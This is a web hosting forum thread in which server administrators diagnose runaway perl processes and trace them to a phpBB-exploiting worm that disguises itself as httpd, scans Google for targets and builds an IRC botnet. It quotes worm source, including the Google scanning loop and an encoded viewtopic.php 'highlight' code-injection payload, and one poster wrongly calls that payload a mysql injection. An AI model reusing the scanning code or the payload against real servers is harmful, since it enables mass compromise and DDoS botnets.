16:03:22 up 25 days, 21:39, 1 user, load average: 1.92, 1.56, 1.46
83 processes: 79 sleeping, 4 running, 0 zombie, 0 stopped
CPU states: 59.8% user 40.1% system 0.0% nice 0.0% iowait 0.0% idle
Mem: 451136k av, 446852k used, 4284k free, 0k shrd, 47752k buff
201372k active, 205400k inactive
Swap: 979956k av, 67020k used, 912936k free 194472k cached

PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
28013 nobody 20 0 1652 1652 1164 R 44.1 0.3 0:05 0 perl
24986 nobody 20 0 3052 3052 2792 R 43.1 0.6 148:57 0 perl
21738 nobody 9 0 3056 3056 1492 S 7.8 0.6 14:09 0 perl
1076 root 8 0 8224 2516 2476 S 2.9 0.5 54:42 0 httpd



how can i find the source of that? normally i would just pkill -9 it and restart apache but i want to track down the source this has been ahppenning all too often!

in WHM there is an option where you can view who has used what CPU, maybe this will help

trust me ;) i did that! because its running as nobody, it just shows up as nobody!


User Domain %CPU %MEM Mysql Processes
nobody 17.06 0.22 0.0
Top Process %CPU 89.3 -bash
Top Process %CPU 88.7 -bash
Top Process %CPU 87.8 -bash


them are the top ones in the list. the nobody was red

If only suexec was secure, then it would be easy, but the fact is it isn't. The only way is trial and error, on my server only one site runs a perl based system, so it's easy to track.

ill just run some sort of cpu throttler/limiter on perl. ill have it kill it after 15-20 min perhaps less

did u try clicking APACHE STATUS under SERVER STATUS category?

It list u the threads, cpu usuage, source ips and other usefull info

28013 nobody 20 0 1652 1652 1164 R 44.1 0.3 0:05 0 perl
24986 nobody 20 0 3052 3052 2792 R 43.1 0.6 148:57 0 perl
21738 nobody 9 0 3056 3056 1492 S 7.8 0.6 14:09 0 perlThe above lines are just showing that a perl script is running with high CPU usage but you don't seem to know exactly which script. So you better find out by using ps, example:
ps -uxp 28013
ps -efxup 28013
ps -wwefxup 28013

For more information of what these parameters, check ps' manpage (man ps)

Also, these proccesses may be normal if there is some loganalyzer daemon (like cPanel installs) which can even slow down the server a lot. So if you don't need it, you may get rid of it.

thanks, it seems to be happenning all to often now. some times it happens, sometimes it doesent. ill look in to this.

again thank you!

no problem, keep us informed if you got any progress about it. I'm pretty curious if these are cPanel proccesses like weblog analyzers :p

i wont know until i notice it again. ill be sure to keep you updated

ok, its happenning again. im going to give your suggestion a wack

PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
7819 nobody 9 0 1564 1204 1084 S 32.0 0.2 1:58 0 perl
16763 nobody 9 0 1568 1208 1080 S 31.0 0.2 1:58 0 perl


i ran ps -efxup 7819


root@ashley [~]# ps -efxup 7819
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 13312 0.0 0.2 4152 916 pts/3 S 12:41 0:00 su - HOSTNAME=EDITED OUT TERM=xterm SHELL=/bin/bas
root 16106 0.0 0.3 4416 1444 pts/3 S 12:41 0:00 -bash TERM=xterm HOME=/root SHELL=/bin/bash USER=root LOGNAME=r
root 18415 0.0 0.1 2712 708 pts/3 R 12:44 0:00 \_ ps -efxup 7819 HOSTNAME=EDITED OUT SHELL=/bin/
root 1 0.0 0.0 1428 336 ? S Nov20 0:25 init [3] HOME=/ TERM=linux BOOT_IMAGE=2.4.27-grsec BOOT_
root 2 0.0 0.0 0 0 ? SW Nov20 0:08 [keventd]
root 3 0.0 0.0 0 0 ? SWN Nov20 0:00 [ksoftirqd_CPU0]
root 4 0.0 0.0 0 0 ? SW Nov20 6:31 [kswapd]
root 5 0.0 0.0 0 0 ? SW Nov20 0:00 [bdflush]
root 6 0.0 0.0 0 0 ? SW Nov20 0:00 [kupdated]
root 7 0.0 0.0 0 0 ? DW Nov20 6:41 [kjournald]
root 32120 0.0 0.0 0 0 ? SW Nov20 0:00 [kjournald]
root 7016 0.0 0.0 1480 420 ? S Nov20 1:54 syslogd -m 0 CONSOLE=/dev/console TERM=linux INIT_VERSION=sysvi
root 22677 0.0 0.0 1400 336 ? S Nov20 0:06 klogd -x CONSOLE=/dev/console TERM=linux INIT_VERSION=sysvinit-
root 32638 0.0 0.1 2124 492 ? S Nov20 0:02 xinetd -stayalive -pidfile /var/run/xinetd.pid LC_MONETARY=en_U
root 21552 0.0 0.1 1516 452 ? S Nov20 0:05 crond CONSOLE=/dev/console TERM=linux INIT_VERSION=sysvinit-2.8
root 5181 0.0 0.0 3480 292 ? S Nov20 0:00 rhnsd --interval 240 CONSOLE=/dev/console TERM=linux INIT_VERSI
root 14492 0.0 0.0 1584 304 ? S Nov20 0:00 /usr/sbin/portsentry -tcp CONSOLE=/dev/console TERM=linux INIT_
root 25758 0.0 0.0 1400 228 tty1 S Nov20 0:00 /sbin/mingetty tty1 HOME=/ TERM=linux BOOT_IMAGE=2.4.27-grsec B
root 29149 0.0 0.0 5840 384 ? S Nov20 0:03 pure-ftpd (SERVER)
root 7367 0.0 0.0 5496 200 ? S Nov20 0:00 /usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/sbin/pureaut
root 29984 0.0 0.1 3556 580 ? S Dec11 0:18 /usr/sbin/sshd MAILTO=root SHELL=/bin/bash PATH=/sbin:/usr/sbin
root 30624 0.0 0.3 6804 1676 ? S 12:41 0:00 \_ /usr/sbin/sshd MAILTO=root SHELL=/bin/bash PATH=/sbin:/usr/
root 27367 0.0 0.6 9844 3048 ? S Dec12 2:01 /usr/local/bin/perl /usr/bin/mrtg /etc/mrtg/mrtg.cfg TERM=xterm
root 13081 0.0 0.0 2136 428 ? S Dec15 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --pid-fil
root 7708 0.0 0.2 2908 1036 ? S Dec15 0:00 antirelayd
root 27494 0.1 1.6 14804 7668 ? SN Dec15 6:16 cpanellogd - sleeping for logs
root 1542 0.0 0.5 7868 2316 ? S Dec15 0:15 cppop - accepting on port 110 0
root 7424 0.0 0.3 8272 1800 ? S Dec15 0:06 cpsrvd - waiting for connections ections
root 326 0.0 1.8 17716 8432 ? S Dec17 0:03 /usr/local/apache/bin/httpd TERM=xterm PATH=/sbin:/usr/sbin:/bi
nobody 7819 0.0 0.2 5192 1204 ? S Dec17 0:00 perl TERM=xterm OLDPWD=/home/i7daysn/public_html/forum PATH=/sb
root 14730 0.4 0.8 9676 3868 ? S 12:44 0:00 /usr/sbin/exim -Mc 1Cg56V-0002JT-OJ TERM=xterm PATH=/sbin:/usr/


im assuming it has something to do with the account "i7daysn"

correct me if im wrong

can someone one tell me what the heck this is. it keeps taken me down, and the path doesent even exist


nobody 14505 32.1 0.3 5028 3564 ? R 20:43 1:45 /hsphere/shared/apache/bin/httpd -DSSL

You better find who's running it, otherwise you'll get in trouble soon.

This exploit searches in google for websites with viewtopic.php (phpBB forums) and tries to exploit them.

FYI, it's a brazillian perl script that is used to do the following:
a) searching in google for phpBB forums (viewtopic.php keyword)
b) attempt to exploit webservers using a known PHP vulnerability
c) force the webservers to connect to an IRC server
d) mass-control all these drones for DDoS or any other activities

This script can do a lot of damage by collecting thousand webservers that are connected to mbit/gigabit lines and establish multiple gigabit DDoS attacks. I had to terminate 2 IPs today because of it. :smoking:

I identified it at your post because of the name it in order to be unnoticable:
my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
You better get rid of it asap and make sure that your server is clean, otherwise abuse reports will start flooding you real bad :drowned: :drowned: :drowned:

i did find the location of the scritp as that site was getting an attack or something like the highlight exploit in phpbb2 :(. they are running the latestversions of everything and the server is running php 5, any suggestions?

hey, i think i got it, but i really want to be safe... would you be willing to give me a hand?

Sure, message me on MSN (psyxakias@sharktech.net)

hello,

over the past few hours i have recompiled apache several times. now all my php sites are prompting me to download the site. Does any one have any suggestions?

thanks in advanced

sorrt, it was suEXEC

very tired right now :nuts:

FYI, it's a brazillian perl script that is used to do the

well i cleanded out the /tmp dir and shortly after this nice little file called worm appears. ATTACHED. Have any suggestions now?

edit:
for now i just followed these steps (http://forums.ev1servers.net/showthread.php?threadid=27771&highlight=noexec+tmp)

Well from the looks of that its a virus that got on your server, that uses google to search for vunrable phpBB versions and run an exploit on them

$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";

######################################
for($n=0;$n<90;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";

That finds the vunrable phpbb board and then runs the folowing command

$cmd = '&highlight=%2527%252esystem(chr(99)%252echr(100)%25 2echr(32)%252echr(47)%252echr(116)%252echr(109)%25 2echr(112)%252ec$

so it would look like

viewtopic.php?t=433493490&highlight=%2527%252esystem(chr(99)%252echr(100)%25 2echr(32)%252echr(47)%252echr(116)%252echr(109)%25 2echr(112)%252ec$

And thats a mysql injection in (binary?) format, just call it an automated script kiddie. :nuts:

But here is my question, how did it get on your server... I would take a look at sercurity a little :nuts:

Hope that helps you!

i already knew what it was in small detail. worms blow.

http://forums.ev1servers.net/showthread.php?threadid=51203&highlight=viewtopic.php
http://forums.ev1servers.net/showthread.php?threadid=51836&highlight=viewtopic.php
http://forums.ev1servers.net/showthread.php?threadid=51705&highlight=viewtopic.php

http://forums.ev1servers.net/search.php?action=showresults&searchid=1891561&sortby=lastpost&sortorder=descending

Yeah, one time i had a worm that sent out hundreds of spam emails. they suck A LOT! $#%$ spam! :eek: :nuts:

humm this nice little SH!# of a worm leaves this behind in the tmp dir along with the worm.txt, a file simply called yay (no extension) ATTACHED.

edit:
Psyxakias is Version 4.3.10 exploitable to this script as i want to convert to that rather then 5.0.3 as version 5 of php breaks way to much :nuts: